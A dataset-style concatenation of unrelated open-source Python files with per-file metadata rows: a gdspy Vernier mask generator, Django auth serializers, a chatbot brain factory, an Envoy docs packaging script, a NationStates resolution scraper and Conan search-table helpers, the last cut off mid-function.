numCells = 12 # number of repeated cells in each dimension
# Now create a series of functions that return a cell. We'll leverage the recursive
# nature of GDS files to keep things simple.
# ------------------------------------------------------------------ #
# Create single Vernier pattern
# ------------------------------------------------------------------ #
def vernier():
# Intialize cell
vernierCell = gdspy.Cell('vernier')
# Calculate properties
vernierWidth = (longFingerLength + baseThickness)
vernierHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers
xCenter = -(vernierWidth/2 - baseThickness)
# First, place the long finger in the middle
vernierCell.add(gdspy.Rectangle([xCenter, -fingerWidth/2],
[xCenter+longFingerLength, fingerWidth/2],layer=layerNumber))
# Next, iterate through and place the other fingers
for k in range(1,numFingers+1):
# Add top fingers
vernierCell.add(gdspy.Rectangle(
[xCenter, fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1)],
[xCenter+shortFingerLength,fingerWidth/2 + fingerSpacing*k +fingerWidth*k],
layer=layerNumber))
# Add bottom fingers
vernierCell.add(gdspy.Rectangle(
[xCenter, -(fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1))],
[xCenter+shortFingerLength,-(fingerWidth/2 + fingerSpacing*k +fingerWidth*k)],
layer=layerNumber))
# Finally, add the edge
baseHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers
vernierCell.add(gdspy.Rectangle([-vernierWidth/2, baseHeight/2],
[xCenter, -baseHeight/2],layer=layerNumber))
# Now let's flatten
vernierCell.flatten()
# Return the cell
return vernierCell
# ------------------------------------------------------------------ #
# Create 2D Vernier pattern from single pattern
# ------------------------------------------------------------------ #
def vernier2D():
# Intialize 2D cell
vernier2DCell = gdspy.Cell('vernier2D')
# Initialize 1D cell
vernierCell = vernier()
# Get vernier dimensions
vernierDims = vernierCell.get_bounding_box()
vernierWidth = abs(vernierDims[0,0] - vernierDims[1,0])
vernierHeight = abs(vernierDims[0,1] - vernierDims[1,1])
# Place one Vernier pattern in the x direction
xCell = gdspy.CellReference(vernierCell,rotation=-90)
xCell.translate(-(vernierHeight/2 + separationDistance),-vernierWidth/2)
vernier2DCell.add(xCell)
# Place another Vernier pattern in the y direction
yCell = gdspy.CellReference(vernierCell,rotation=180)
yCell.translate(-vernierWidth/2,-(vernierHeight/2 + separationDistance))
vernier2DCell.add(yCell)
# Return final cell
return vernier2DCell
# ------------------------------------------------------------------ #
# Create Box outline
# ------------------------------------------------------------------ #
def boxOutline():
# initialize cell
outlineCell = gdspy.Cell('outline')
# define an outer box
outerBox = gdspy.Rectangle([-outerBoxWidth/2,-outerBoxWidth/2],
[outerBoxWidth/2,outerBoxWidth/2],layer=layerNumber)
# define an inner box
innerBox = gdspy.Rectangle([-innerBoxWidth/2,-innerBoxWidth/2],
[innerBoxWidth/2,innerBoxWidth/2],layer=layerNumber)
# now subtract the two
outline = gdspy.fast_boolean(outerBox,innerBox,'xor',layer=layerNumber)
# update the cell
outlineCell.add(outline)
# return the cell
return outlineCell
# ------------------------------------------------------------------ #
# Create Single Chip
# ------------------------------------------------------------------ #
def vernierChip():
# Initialize cells
vernierChipCell = gdspy.Cell('vernierChip')
vernier2DCell = vernier2D()
boxOutlineCell = boxOutline()
# Add border first
vernierChipCell.add(gdspy.CellReference(boxOutlineCell,(0,0)))
chipDims = vernierChipCell.get_bounding_box()
chipWidth = abs(chipDims[0,0] - chipDims[1,0])
# Now iterate through placing corners
thetaPos = [45, 135, -135, -45]
thetaRot = [0, 90, 180, -90]
for k in range(0,4):
xPos = np.sign(np.cos(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2)
yPos = np.sign(np.sin(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2)
vernierChipCell.add(gdspy.CellReference(vernier2DCell,(xPos,yPos),rotation=thetaRot[k]))
# return cell
return vernierChipCell
# ------------------------------------------------------------------ #
# Tapeout entire wafer
# ------------------------------------------------------------------ #
def vernierMask():
# Initialize cells
vernierMaskCell = gdspy.Cell('vernierMask')
vernierChipCell = vernierChip()
# Get chip dimensions
chipDims = vernierChipCell.get_bounding_box()
chipWidth = abs(chipDims[0,0] - chipDims[1,0])
# Get mask center
center = (numCells * chipWidth) / 2
# Let's make an array
vernierMaskCell.add(gdspy.CellArray(
vernierChipCell, numCells, numCells, (chipWidth, chipWidth), (-center, -center)
))
# return final cell
return vernierMaskCell
# ------------------------------------------------------------------ #
# OUTPUT
# ------------------------------------------------------------------ #
vernierMask()
# Output the layout to a GDSII file (default to all created cells).
# Set the units we used to micrometers and the precision to nanometers.
filename = 'vernierMask.gds'
outPath = os.path.abspath(os.path.join(d, 'GDS/'+filename))
gdspy.write_gds(outPath, unit=1.0e-6, precision=1.0e-9)
| 35.233645 | 96 | 0.554377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,327 | 0.441247 |
9ee57d6363120b9d54a9902e2243f9122d20af71 | 4,810 | py | Python | src/core/serializers.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
]
| 17 | 2019-05-11T22:15:34.000Z | 2022-03-26T22:45:33.000Z | src/core/serializers.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
]
| 390 | 2019-05-23T10:48:57.000Z | 2021-12-17T21:01:43.000Z | src/core/serializers.py | pradipta/back-end | 05895b051afc4c8e0cb17db708063d80102e9de5 | [
"MIT"
]
| 40 | 2019-05-21T14:41:57.000Z | 2021-01-30T13:39:38.000Z | from django.contrib.auth import get_user_model
from rest_auth.registration.serializers import (
RegisterSerializer as BaseRegisterSerializer,
)
from rest_auth.registration.serializers import (
SocialLoginSerializer as BaseSocialLoginSerializer,
)
from rest_auth.serializers import LoginSerializer as BaseLoginSerializer
from rest_auth.serializers import (
PasswordResetConfirmSerializer as BasePasswordResetConfirmSerializer,
)
from rest_auth.serializers import UserDetailsSerializer as BaseUserDetailsSerializer
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models import Profile
# noinspection PyAbstractClass
class LoginSerializer(BaseLoginSerializer):
"""
Extends the default LoginSerializer in order to return
custom error messages
"""
def validate(self, attrs):
try:
return super().validate(attrs)
except serializers.ValidationError as ex:
ex.detail = "The email or password you entered is incorrect!"
raise ex
# noinspection PyAbstractClass
class PasswordResetConfirmSerializer(BasePasswordResetConfirmSerializer):
"""
Extends the default PasswordResetConfirmSerializer in order to return
custom error messages
"""
def validate(self, attrs):
try:
return super().validate(attrs)
except serializers.ValidationError as ex:
if "new_password2" in ex.detail:
ex.detail = ex.detail["new_password2"][0]
else:
ex.detail = "Could not reset password. Reset token expired or invalid."
raise ex
# noinspection PyAbstractClass
class CustomSocialLoginSerializer(BaseSocialLoginSerializer):
"""
Extends default SocialLoginSerializer to add additional details to some
failed login attempts
"""
def validate(self, attrs):
try:
res = super().validate(attrs)
return res
except ValidationError as ex:
if "User is already registered with this e-mail address." in ex.detail:
ex.detail[0] = (
"User is already registered with this e-mail address. "
"Please login using the form above."
)
raise ex
# noinspection PyAbstractClass
class RegisterSerializer(BaseRegisterSerializer):
email = serializers.EmailField(required=True)
password = serializers.CharField(write_only=True)
first_name = serializers.CharField(write_only=True)
last_name = serializers.CharField(write_only=True)
# legacy compat
zip = serializers.CharField(write_only=True, required=False)
zipcode = serializers.CharField(write_only=True, required=False)
# Overrides the default required password fields
password1 = None
password2 = None
def get_cleaned_data(self):
return {
"username": self.validated_data.get("email", ""),
"email": self.validated_data.get("email", ""),
# allauth uses password1 internally for creation
"password1": self.validated_data.get("password", ""),
"first_name": self.validated_data.get("first_name", ""),
"last_name": self.validated_data.get("last_name", ""),
"zipcode": self.validated_data.get("zipcode", ""),
}
def validate(self, data):
return data
UserModel = get_user_model()
class ProfileSerializer(serializers.ModelSerializer):
class Meta:
model = Profile
fields = "__all__"
class UserDetailsSerializer(BaseUserDetailsSerializer):
profile = ProfileSerializer()
class Meta:
model = UserModel
fields = ("username", "email", "first_name", "last_name", "profile")
read_only_fields = ("email",)
def to_representation(self, instance: UserModel) -> dict:
"""Move fields from Profile to user representation."""
representation = super().to_representation(instance)
profile = representation.pop("profile")
representation["zipcode"] = profile["zipcode"]
representation["is_mentor"] = profile["is_mentor"]
return representation
class UserSerializer(BaseUserDetailsSerializer):
profile = ProfileSerializer()
class Meta:
model = UserModel
fields = ("username", "email", "first_name", "last_name", "profile")
read_only_fields = ("email",)
def to_representation(self, instance: UserModel) -> dict:
"""Move fields from Profile to user representation."""
representation = super().to_representation(instance)
profile = representation.pop("profile")
profile.pop("user")
for key, val in profile.items():
representation[key] = val
return representation
| 33.172414 | 88 | 0.677755 | 3,983 | 0.828067 | 0 | 0 | 0 | 0 | 0 | 0 | 1,256 | 0.261123 |
9ee5da5b7c789afc93423e16612fb9f6de97baba | 3,519 | py | Python | src/programy/brainfactory.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
]
| null | null | null | src/programy/brainfactory.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
]
| null | null | null | src/programy/brainfactory.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | [
"MIT"
]
| 4 | 2019-04-01T15:42:23.000Z | 2020-11-05T08:14:27.000Z | """
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.brain import Brain
from programy.utils.classes.loader import ClassLoader
from abc import abstractmethod, ABCMeta
class BrainSelector(object):
__metaclass__ = ABCMeta
def __init__(self, configuration):
self._configuration = configuration
@abstractmethod
def select_brain(self, brains):
raise NotImplementedError()
class DefaultBrainSelector(BrainSelector):
def __init__(self, configuration, brains):
BrainSelector.__init__(self, configuration)
self._brains = brains
self._iterator = None
self._set_iterator()
def _set_iterator(self):
if self._brains:
self._iterator = iter(self._brains.values())
def select_brain(self):
try:
if self._iterator:
return next(self._iterator)
except StopIteration:
self._set_iterator()
try:
if self._iterator:
return next(self._iterator)
except StopIteration:
pass
return None
class BrainFactory(object):
def __init__(self, bot):
self._brains = {}
self._brain_selector = None
self.loads_brains(bot)
self.load_brain_selector(bot.configuration)
def brainids(self):
return self._brains.keys()
def brain(self, id):
if id in self._brains:
return self._brains[id]
else:
return None
def loads_brains(self, bot):
for config in bot.configuration.configurations:
brain = Brain(bot, config)
self._brains[brain.id] = brain
def load_brain_selector(self, configuration):
if configuration.brain_selector is None:
self._brain_selector = DefaultBrainSelector(configuration, self._brains)
else:
try:
self._brain_selector = ClassLoader.instantiate_class(configuration.brain_selector)(configuration, self._brains)
except Exception as e:
self._brain_selector = DefaultBrainSelector(configuration, self._brains)
def select_brain(self):
return self._brain_selector.select_brain()
def get_question_counts(self):
brains = []
for brainid, brain in self._brains.items():
brains.append({"id": brainid,
"questions": brain.num_questions})
return brains
| 34.165049 | 127 | 0.680591 | 2,282 | 0.64848 | 0 | 0 | 87 | 0.024723 | 0 | 0 | 1,114 | 0.316567 |
9ee68cd6efba5b094a83a85c60acb1031a826384 | 2,050 | py | Python | tools/docs/generate_api_rst.py | dcillera/envoy | cb54ba8eec26f768f8c1ae412113b07bacde7321 | [
"Apache-2.0"
]
| 17,703 | 2017-09-14T18:23:43.000Z | 2022-03-31T22:04:17.000Z | tools/docs/generate_api_rst.py | dcillera/envoy | cb54ba8eec26f768f8c1ae412113b07bacde7321 | [
"Apache-2.0"
]
| 15,957 | 2017-09-14T16:38:22.000Z | 2022-03-31T23:56:30.000Z | tools/docs/generate_api_rst.py | dcillera/envoy | cb54ba8eec26f768f8c1ae412113b07bacde7321 | [
"Apache-2.0"
]
| 3,780 | 2017-09-14T18:58:47.000Z | 2022-03-31T17:10:47.000Z | import os
import shutil
import sys
import tarfile
def include_package(envoy_api_protos, rst_file_path, prefix):
# `envoy_api_rst_files` is a list of file paths for .proto.rst files
# generated by protodoc
#
# we are only interested in the proto files generated for envoy protos,
# not for non-envoy dependencies
if ("pkg/" + prefix) not in rst_file_path:
return None
# derive the "canonical" path from the filepath
canonical = f"{rst_file_path.split('pkg/' + prefix)[1]}"
# we are only interested in the actual v3 protos, not their dependencies
if (prefix + canonical) not in envoy_api_protos:
return None
return canonical
def main():
proto_srcs = sys.argv[1]
envoy_api_rst_files = sys.argv[1:-1]
output_filename = sys.argv[-1]
with open(proto_srcs) as f:
# the contents of `proto_srcs` are the result of a bazel genquery,
# containing bazel target rules, eg:
#
# @envoy_api//envoy/watchdog/v3:abort_action.proto
#
# this transforms them to a list with a "canonical" form of:
#
# envoy/watchdog/v3/abort_action.proto.rst
#
envoy_api_protos = [
f"{src.split('//')[1].replace(':', '/')}.rst" for src in f.read().split("\n") if src
]
for rst_file_path in envoy_api_rst_files:
canonical = include_package(envoy_api_protos, rst_file_path, "envoy/")
if canonical is None:
canonical = include_package(envoy_api_protos, rst_file_path, "contrib/envoy/")
if canonical is None:
continue
target = os.path.join("rst-out/api-v3", canonical)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
shutil.copy(rst_file_path, target)
# output the generated rst files to a tarfile for consumption
# by other bazel rules
with tarfile.open(output_filename, "w") as tar:
tar.add("rst-out", arcname=".")
if __name__ == "__main__":
main()
| 32.03125 | 96 | 0.642927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 823 | 0.401463 |
9ee7307b78f857465fe941638e5a41dd83ec835a | 15,792 | py | Python | src/wa_parser.py | ifly6/NS-WA-Authorboards | 57921457795306867844a29cdfce88bfcdd1c3f6 | [
"Apache-2.0"
]
| null | null | null | src/wa_parser.py | ifly6/NS-WA-Authorboards | 57921457795306867844a29cdfce88bfcdd1c3f6 | [
"Apache-2.0"
]
| null | null | null | src/wa_parser.py | ifly6/NS-WA-Authorboards | 57921457795306867844a29cdfce88bfcdd1c3f6 | [
"Apache-2.0"
]
| null | null | null | # Copyright (c) 2020 ifly6
import html
import io
import re
from datetime import datetime
from functools import cache
from typing import Tuple
import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
from lxml import etree
from pytz import timezone
from ratelimit import limits, sleep_and_retry
from helpers import ref
from src import wa_cacher
""" Imperium Anglorum:
This is adapted from proprietary InfoEurope code which in part does most of this already. Eg the proposal portions
which translate, the locality adjustments, API reading, etc. There is also code in beta (not-in-production)
which would have done this entirely, but I never got around to developing the VIEWS for that portion of the website.
It seems much easier just to commit something like this given that all the code is already present.
See ifly6.no-ip.org for more information. """
_headers = {
'User-Agent': 'WA parser (Auralia; Imperium Anglorum)'
}
class ApiError(Exception):
pass
@sleep_and_retry
@limits(calls=25, period=30) # 50 calls every 30 seconds they say but somehow this is fake news
def call_api(url) -> str:
response = requests.get(url, headers=_headers)
if response.status_code != 200:
raise ApiError('{} error at api url: {}'.format(response.status_code, str(url)))
return response.text
def clean_chamber_input(chamber):
""" Turns ambiguous chamber information into tuple (int, str) with chamber id and chamber name """
if type(chamber) == str:
if chamber == '1':
chamber = 1
elif chamber == '2':
chamber = 2
elif chamber == 'GA':
chamber = 1
elif chamber == 'SC':
chamber = 2
chamber_name = 'GA' if chamber == 1 else \
'SC' if chamber == 2 else ''
return chamber, chamber_name
def localised(dt: 'datetime', tz='US/Eastern'):
return timezone(tz).localize(dt)
@cache
def _category_map():
d = {'Advancement of Industry': 'Environmental Deregulation',
'Civil Rights': 'Mild',
'Human Rights': 'Mild',
'Education and Creativity': 'Artistic',
'Environmental': 'Automotive',
'Free Trade': 'Mild',
'Furtherment of Democracy': 'Mild',
'Global Disarmament': 'Mild',
'Health': 'Healthcare',
'International Security': 'Mild',
'Moral Decency': 'Mild',
'Political Stability': 'Mild',
'Regulation': 'Consumer Protection',
'Gun Control': 'Tighten',
'Social Justice': 'Mild'}
return {ref(k): v for k, v in d.items()} # force ref name for matching
# nb that this is identical to dict( ( ref(k), v ) for k, v in d.items() )
def _translate_category(category: str, s: str) -> Tuple[bool, str]:
if ref(category) in _category_map() and s == '0':
return True, _category_map()[ref(category)] # yield correct name from ref name of category
# if it isn't 0, then it doesn't apply, return given
# if not in the list, return given
return False, s
def capitalise(s):
s = s.replace('_', ' ').strip()
# exceptions
capitalisation_exceptions = wa_cacher.load_capitalisation_exceptions()
for i in capitalisation_exceptions:
if s.strip().lower() == i.strip().lower():
return i # replace with manual correction
# only capitalise words longer than 2 letters ('new') and always capitalise first
# unless the word is in given list
# > fanboys & the
s = " ".join(
w.capitalize()
if (len(w) > 2 and w not in ['for', 'and', 'nor', 'but', 'yet', 'the']) or (i == 0)
else w
for i, w in enumerate(s.split())
).strip() # avoid apostrophe capitalisations
# but capitalise st -> St
for exception in ['St']:
s = ' '.join((exception if w.lower() == exception.lower() else w)
for w in s.split())
# for split in ['-']:
# # as first should always be capitalised, not checking doesn't matter
# s = split.join(w[:1].upper() + w[1:] for i, w in enumerate(s.split(split))) # capitalise first letter only
# "Christian DeMocrats"
# python str.capitalize forces all other chars to lower
# don't use str.capitalize above
for numeral in ['ii', 'iii', 'iv', 'v', 'vi', 'vii', 'viii', 'ix', 'x']:
s = re.sub(r'(?<=\s){}$'.format(numeral), numeral.upper(), s) # matches only trailing numerals
# people used to use WA missions; capitalise these, they are separate words
s = re.sub(r'(?<=\s)(Wa|wa|wA)(?=\s)', 'WA', s) # if between two spaces
s = re.sub(r'^(Wa|wa|wA)(?=\s)', 'WA', s) # if at start (eg WA Mission of NERV-UN)
return s
def _get_council(i):
if i == 'GA' or i == 1: return 'GA'
if i == 'SC' or i == 2: return 'SC'
if i == 'UN' or i == 0: return 'UN'
raise ValueError(f'provided council code {i} is invalid')
class WaPassedResolution:
def __init__(self, **kwargs):
# core vote information
self.resolution_num = None
self.title = None
self.implementation = None
# category and strength
self.chamber = None
self.category = None
self.strength = None
# handle repeals
self.is_repealed = None
self.repealed_by = None
self.is_repeal = None
self.repeals = None
# text
self.text = None
# ancillary information
self.author = None
self.coauthor0 = None
self.coauthor1 = None
self.coauthor2 = None
self.votes_for = None
self.votes_against = None
self.council = None
self.__dict__.update(kwargs) # django does this automatically, i'm not updating it; lazy
@staticmethod
def parse_ga(res_num, council=1):
from src.wa_cacher import Cacher
try:
cacher = Cacher.load()
except FileNotFoundError:
cacher = Cacher() # init new
api_url = 'https://www.nationstates.net/cgi-bin/api.cgi?wa={}&id={}&q=resolution'.format(council, res_num)
in_cacher = cacher.contains(api_url)
if not in_cacher:
this_response = call_api(api_url)
cacher.update(api_url, this_response)
else:
this_response = cacher.get(api_url)
xml = etree.parse(io.StringIO(this_response))
if not xml.xpath('/WA/RESOLUTION/NAME'):
raise ValueError(f'resolution number {res_num} is invalid; no such resolution exists')
resolution_is_repealed = xml.xpath('/WA/RESOLUTION/REPEALED_BY') != []
resolution_is_a_repeal = xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID') != []
resolution_text = html.unescape(xml.xpath('/WA/RESOLUTION/DESC')[0].text)
resolution_author = xml.xpath('/WA/RESOLUTION/PROPOSED_BY')[0].text
print(resolution_author)
print(type(resolution_author))
if resolution_author is None or str(resolution_author).strip() == '':
raise RuntimeError('resolution author is empty')
author = capitalise(resolution_author)
resolution = WaPassedResolution(
council=_get_council(council),
resolution_num=res_num,
title=xml.xpath('/WA/RESOLUTION/NAME')[0].text,
implementation=localised(
datetime.utcfromtimestamp(int(xml.xpath('/WA/RESOLUTION/IMPLEMENTED')[0].text)),
'UTC'
).astimezone(timezone('US/Eastern')), # convert to eastern time
chamber=clean_chamber_input(xml.xpath('/WA/RESOLUTION/COUNCIL')[0].text)[1],
category=capitalise(xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text),
strength=capitalise(
_translate_category(
xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text, # category
xml.xpath('/WA/RESOLUTION/OPTION')[0].text # option
)[1] # get name
),
is_repealed=resolution_is_repealed,
repealed_by=int(xml.xpath('/WA/RESOLUTION/REPEALED_BY')[0].text) if resolution_is_repealed else None,
is_repeal=resolution_is_a_repeal,
repeals=int(xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID')[0].text) if resolution_is_a_repeal else None,
# text and author
text=resolution_text.strip(),
author=author.strip(),
# vote data
votes_for=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_FOR')[0].text),
votes_against=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_AGAINST')[0].text)
)
assert resolution.strength != '0', 'resolution {} has strength 0 with category {}'.format(
resolution.title, resolution.category
)
# overwrite category if repeal with the repeals field; NS API is broken sometimes for some reason
if resolution_is_a_repeal:
resolution.strength = str(int(resolution.repeals)) # cast to integer
# check for co-authors
coauth_list = xml.xpath('/WA/RESOLUTION/COAUTHOR/N')
if len(coauth_list) != 0:
print('received from API coauthors: {}'.format(
', '.join([capitalise(n.text) for n in coauth_list])
))
try:
resolution.coauthor0 = capitalise(coauth_list[0].text)
except IndexError:
pass
try:
resolution.coauthor1 = capitalise(coauth_list[1].text)
except IndexError:
pass
try:
resolution.coauthor2 = capitalise(coauth_list[2].text)
except IndexError:
pass
else:
cleaned_resolution_text = resolution_text \
.replace('[i]', '').replace('[/i]', '') \
.replace('[b]', '').replace('[/b]', '') \
.replace('[u]', '').replace('[/u]', '')
coauthor_matches = [s for s in cleaned_resolution_text.splitlines()
if re.search(
r'(Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:?)|'
r'(This resolution includes significant contributions made by\s+)',
s, re.IGNORECASE
)]
if len(coauthor_matches) > 0:
coauthor_line = re.sub(r'Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:? ', repl='',
string=coauthor_matches[0], flags=re.IGNORECASE)
print(f'\tidentified coauthor line: "{coauthor_line}"')
coauthor_line = coauthor_line \
.replace('[i]', '') \
.replace('[/i]', '') \
.replace('[b]', '') \
.replace('[/b]', '') \
.replace('[u]', '') \
.replace('[/u]', '')
if '[nation' in coauthor_line.lower(): # scion used the [Nation] tag instead of lower case once
amended_line = re.sub(r'(?<=\[nation)=(.*?)(?=\])', '', coauthor_line.lower()) # remove 'noflag' etc
coauthors = re.findall(r'(?<=\[nation\])(.*?)(?=\[/nation\])', amended_line.lower())
else:
# this will break with names like "Sch'tz and West Runk'land"
coauthors = re.split(r'(,? and )|(, )', coauthor_line, re.IGNORECASE)
coauthors = [i for i in coauthors if i is not None and i.strip() != 'and'] # post facto patching...
coauthors = [ref(s).replace('.', '') for s in coauthors] # cast to reference name
print(f'\tidentified coauthors as {coauthors}')
# pass each co-author in turn
'''
While it could be changed so that the original line's capitalisation is preserved, doing this might
introduce inconsistency in capitalisation of the same nation. Eg '[nation]imperium_anglorum[/nation]' would
be done under capitalisation rules while something provided as 'Imperium ANGLORUM' would be let through.
Because some authors use a ref'd name IN the nation tags, something like [nation]transilia[/nation] cannot
be disentangled from 'Transilia' if the former is proper and the latter is not. A proper-capitalisation
dictionary would be necessary and I am unwilling to download and parse all historical daily dumps for
something this minor.
'''
try:
resolution.coauthor0 = capitalise(coauthors[0])
except IndexError:
pass
try:
resolution.coauthor1 = capitalise(coauthors[1])
except IndexError:
pass
try:
resolution.coauthor2 = capitalise(coauthors[2])
except IndexError:
pass
cacher.save()
return resolution
def get_count() -> int:
soup = BeautifulSoup(call_api('http://forum.nationstates.net/viewtopic.php?f=9&t=30'), 'lxml')
resolution = soup.select('div#p310 div.content a')
return len(resolution)
def parse() -> 'pd.DataFrame':
# find the number of resolutions from Passed GA Resolutions
passed_res_max = get_count()
print(f'found {passed_res_max} resolutions')
# confirm that we have X resolutions
res_list = []
max_res = -1
for i in range(passed_res_max - 1, passed_res_max + 20): # passed resolutions should never be more than 20 behind
try:
print(f'gettingGA {i + 1} of {passed_res_max} predicted resolutions')
d = WaPassedResolution.parse_ga(i + 1).__dict__ # note that 0 returns resolution at vote, need to 1-index
res_list.append(d)
except ValueError:
print('out of resolutions; data should be complete')
max_res = i
break
print(f'found {max_res} resolutions; getting historical')
# get API information for each resolution
for i in reversed(range(0, passed_res_max - 1)): # passed_res_max is already called above
print(f'got {max_res - passed_res_max + i} of {max_res} resolutions')
print(f'getting GA {i + 1}')
r = WaPassedResolution.parse_ga(i + 1) # note that 0 returns resolution at vote, need to 1-index
d = r.__dict__ # hacky cheating to get into dict
res_list.append(d)
# put it up in pandas
df = pd.DataFrame(res_list).replace({None: np.nan})
df.drop(columns=['text'], inplace=True)
df.rename(columns={
'council': 'Council', # Auralia used these names for columns
'resolution_num': 'Number',
'title': 'Title',
'category': 'Category',
'strength': 'Sub-category',
'votes_for': 'Votes For',
'votes_against': 'Votes Against',
'implementation': 'Date Implemented',
'author': 'Author'
}, inplace=True)
df.sort_values(by='Number', inplace=True)
def join_coauthors(coauthor_list, j=', '):
""" Removes empty/whitespace-only strings and then joins """
authors = [s for s in coauthor_list if s.strip() != '']
return j.join(authors)
df['Co-authors'] = df[['coauthor0', 'coauthor1', 'coauthor2']] \
.replace({np.nan: ''}) \
.agg(join_coauthors, axis=1)
assert all(df['Sub-category'] != '0'), 'resolutions {} have sub-category 0'.format(
df.loc[df['Sub-category'] != '0', 'Title'].values
)
return df[['Number', 'Title', 'Category', 'Sub-category', 'Author', 'Co-authors',
'Votes For', 'Votes Against', 'Date Implemented']].copy() # take only relevant vars
| 38.705882 | 123 | 0.590109 | 8,182 | 0.51811 | 0 | 0 | 8,426 | 0.533561 | 0 | 0 | 6,321 | 0.400266 |
9ee7fc2118d9db373e3131dcd7ab5c6417b15d3a | 5,191 | py | Python | conans/search/binary_html_table.py | matthiasng/conan | 634eadc319da928084633a344d42785edccb8d6c | [
"MIT"
]
| 2 | 2019-01-09T10:01:29.000Z | 2019-01-09T10:01:31.000Z | conans/search/binary_html_table.py | matthiasng/conan | 634eadc319da928084633a344d42785edccb8d6c | [
"MIT"
]
| 1 | 2019-01-09T10:09:41.000Z | 2019-01-09T10:09:41.000Z | conans/search/binary_html_table.py | matthiasng/conan | 634eadc319da928084633a344d42785edccb8d6c | [
"MIT"
]
| null | null | null | import os
from collections import OrderedDict, defaultdict
from conans.model.ref import PackageReference
from conans.util.files import save
class RowResult(object):
def __init__(self, remote, reference, data):
self.remote = remote
self.reference = reference
self._data = data
@property
def recipe(self):
return self.reference
@property
def package_id(self):
return self._data['id']
@property
def outdated(self):
return self._data['outdated']
def row(self, headers):
""" Returns package data according to headers """
assert isinstance(headers, Headers), "Wrong type: {}".format(type(headers))
for it in headers.keys:
try:
yield getattr(self, it)
except AttributeError:
yield self._data[it]
for it in headers.settings:
yield self._data['settings'].get(it, None)
for it in headers.options:
yield self._data['options'].get(it, None)
if headers.requires:
prefs = [PackageReference.loads(it) for it in self._data['requires']]
yield ', '.join(map(str, [it.ref for it in prefs]))
class Headers(object):
_preferred_ordering = ['os', 'arch', 'compiler', 'build_type']
def __init__(self, settings, options, requires, keys):
# Keys: columns to classify
self.keys = keys
self.options = options
self.requires = requires
# - Order settings
_settings = defaultdict(list)
for it in settings:
try:
category, _ = it.split('.', 1)
except ValueError:
_settings[it].append(it)
else:
_settings[category].append(it)
self.settings = []
for it in self._preferred_ordering:
if it in _settings:
self.settings.extend(sorted(_settings[it]))
for it, values in _settings.items():
if it not in self._preferred_ordering:
self.settings.extend(sorted(values))
def row(self, n_rows=2):
"""
Retrieve list of headers as a single list (1-row) or as a list of tuples with
settings organized by categories (2-row).
Example output:
1-row: ['os', 'arch', 'compiler', 'compiler.version', 'compiler.libcxx', 'build_type']
2-row: [('os', ['']), ('arch', ['']), ('compiler', ['', 'version', 'libcxx']),]
"""
headers = list(self.keys)
if n_rows == 1:
headers.extend(self.settings + self.options)
if self.requires:
headers.append('requires')
return headers
elif n_rows == 2:
headers = [(it, ['']) for it in headers]
settings = self._group_settings(self.settings)
headers.extend(settings)
headers.append(('options', self.options))
if self.requires:
headers.append(('requires', ['']))
return headers
else:
raise NotImplementedError("not yet")
@staticmethod
def _group_settings(settings):
"""
From one row to two-rows using '.' as separator
"""
ret = OrderedDict()
for setting in settings:
try:
category, value = setting.split(".", 1)
except ValueError:
ret.setdefault(setting, []).append('')
else:
ret.setdefault(category, []).append(value)
return [(key, values) for key, values in ret.items()]
class Results(object):
def __init__(self, results):
self._results = results
# Collect data inspecting the packages
_settings = set()
_options = set()
_remotes = set()
self.requires = False
for it in results:
_remotes.add(it['remote'])
for p in it['items'][0]['packages']:
_settings = _settings.union(list(p['settings'].keys()))
_options = _options.union(list(p['options'].keys()))
if len(p['requires']):
self.requires = True
self.settings = list(_settings)
self.options = list(_options)
self.remotes = list(_remotes)
def get_headers(self, keys=('remote', 'reference', 'outdated', 'package_id')):
return Headers(self.settings, self.options, self.requires, keys=keys)
def packages(self):
for it in self._results:
remote = it['remote']
reference = it['items'][0]['recipe']['id']
for p in it['items'][0]['packages']:
r = RowResult(remote, reference, p)
yield r
def html_binary_graph(search_info, reference, table_filename, template):
# Adapt data to the template (think twice about the format before documenting)
search = {'reference': str(reference)}
